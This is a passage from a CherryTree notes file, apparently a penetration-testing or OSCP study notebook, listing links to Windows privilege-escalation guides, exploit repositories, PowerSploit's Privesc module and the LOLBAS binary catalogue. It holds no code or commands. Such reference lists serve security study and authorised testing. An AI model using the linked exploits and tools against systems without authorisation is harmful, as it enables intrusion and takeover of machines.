•</rich_text>
<rich_text weight="heavy"> winprivesc</rich_text>
<rich_text>: </rich_text>
<rich_text link="webs https://github.com/joshruppe/winprivesc">https://github.com/joshruppe/winprivesc</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">Windows Privilege Escalation Guide:</rich_text>
<rich_text> </rich_text>
<rich_text link="webs https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/">https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">Windows-Privesc:</rich_text>
<rich_text> </rich_text>
<rich_text link="webs https://github.com/togie6/Windows-Privesc">https://github.com/togie6/Windows-Privesc</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">WindowsExploits:</rich_text>
<rich_text> </rich_text>
<rich_text link="webs https://github.com/abatchy17/WindowsExploits">https://github.com/abatchy17/WindowsExploits</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">PowerSploit:</rich_text>
<rich_text> </rich_text>
<rich_text link="webs https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc">https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">Windows EoP:</rich_text>
<rich_text> </rich_text>
<rich_text link="webs https://guif.re/windowseop">https://guif.re/windowseop</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">OSCP Notes:</rich_text>
<rich_text> </rich_text>
<rich_text link="webs https://securism.wordpress.com/oscp-notes-privilege-escalation-windows/">https://securism.wordpress.com/oscp-notes-privilege-escalation-windows/</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">PrivEsc Binaries:</rich_text>
<rich_text> </rich_text>
<rich_text link="webs https://lolbas-project.github.io/">https://lolbas-project.github.io/</rich_text>
</node>
</node>
</cherrytree>